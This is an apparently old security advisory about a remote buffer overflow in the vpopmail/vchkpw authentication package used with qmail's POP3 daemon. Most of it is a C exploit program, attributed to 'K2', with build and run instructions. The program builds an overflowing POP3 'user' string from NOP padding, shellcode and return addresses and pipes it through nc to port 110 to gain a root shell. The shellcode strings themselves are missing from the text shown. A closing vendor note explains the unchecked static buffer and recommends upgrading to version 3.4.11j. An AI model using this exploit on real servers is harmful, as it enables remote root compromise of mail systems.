

    Systems using vpopmail (mostly those with qmail)


    'K2' found following.  When vpopmail is used to authenticate  user
    information a remote attacker  may compromise the privilege  level
    that vpopmail is running, naturally root.  Sample exploit code can
    be found at

    Here it is below:

       qmail-qpop3d-vchkpw.c (v.3)
       by: K2,
       The inter7 supported vchkpw/vpopmail package (replacement for chkeckpasswd)
       has big problems ;)
       gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
       ( ./vpop [offset] [alignment] ; cat ) | nc 110
       play with the alignment to get it to A) crash B) work.
       qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for now.
       Tested agenst: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE
       Hi plaguez.
       prop's to Interrupt for testing with bsd, _eixon an others ;)
       cheez shell's :)
       THX goes out to STARBUCKS*!($#!
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #define SIZE   260
    #define NOP    0x90
    #ifdef SX86
    #define DEFOFF 0x8047cfc
    #define NOPDEF 75
    #elif BSD
    #define DEFOFF 0xbfbfdbbf
    #define NOPDEF 81
    #define DEFOFF 0xbffffcd8
    #define NOPDEF 81
    char *shell =
    #ifdef SX86 // Solaris IA32 shellcode, cheez
    #elif BSD // fBSD shellcode,
    #else // Linux shellcode, no idea
    int main(int argc, char **argv)
       int i=0,esp=0,offset=0,nop=NOPDEF;
       char buffer[SIZE];
       if (argc > 1) offset += strtol(argv[1], NULL, 0);
       if (argc > 2) nop += strtol(argv[2], NULL, 0);
       esp = DEFOFF;
       memset(buffer, NOP, SIZE);
       memcpy(buffer+nop, shell, strlen(shell));
       for (i = (nop+strlen(shell)+1); i < SIZE; i += 4) {
          *((int *) &buffer[i]) = esp+offset;
       printf("user %s\n",buffer);
       printf("pass ADMR0X&*!(#&*(!\n");
       fprintf(stderr,"\nbuflen = %d, nops = %d, target = 0x%x\n\n",strlen(buffer),nop,esp+offset);


    Note  that  there  are  some  serious  security  problems  in  the
    vpopmail/vchkpw  package.   But  vpopmail/vchkpw  is  not  part of
    qmail.   It  is  recommended  upgrading  to  the latest version of
    vpopmail  which  fixes  the  exploit.  Pick  up the current stable

    Version 3.4.11j as of Jan 20th has the fix.

    vchkpw  -  which  authenticates  a  user  with  information   from
    qmail-pop up  was storing  the information  in a  staticly defined
    buffer.   There  was  no  buffer  over  run checking done. Current
    stable version now checks  for buffer overruns in  several places.
    A security audit of the code is being done. Which it sorely needs.